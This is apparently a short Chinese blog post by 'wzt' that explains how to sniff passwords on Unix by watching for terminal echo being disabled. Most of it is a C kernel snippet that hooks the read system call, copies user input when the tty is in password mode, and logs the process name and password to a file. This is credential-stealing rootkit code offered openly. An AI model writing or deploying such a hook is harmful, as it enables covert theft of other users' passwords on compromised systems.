作者:wzt
unix系统在输入密码的时候, 都会关闭终端回显, 利用这个特性, 就可以判断当终端属性改变的时候, 就可能是一次密码输入的过程, 当前read系统调用的buff中, 就是存放密码的内容。 代码片段如下:
asmlinkage ssize_t new_read(unsigned int fd, char __user * buf, size_t count)
{
ssize_t ret;
ret = (orig_read)(fd, buf, count);
if (ret > 0) {
struct task_struct *tsk = current;
struct tty_struct *tty = NULL;
char *tmp_buf = NULL, buff[200];
//spin_lock(&tty_sniff_lock);
tmp_buf = (char *)kmalloc(ret, GFP_ATOMIC);
if (!tmp_buf)
return ret;
copy_from_user(tmp_buf, buf, ret);
tty = tsk->signal->tty;
if (tty && IS_PASSWD(tty)) {
snprintf(buff, sizeof(buff),
“<process: %s>\t–\tpasswd: %s\n”, tsk->comm, tmp_buf);
write_to_file(SNIFF_LOG, buff, strlen(buff));
}
kfree(tmp_buf);
//spin_unlock(&tty_sniff_lock);
}
return ret;
}
本文还暂无回复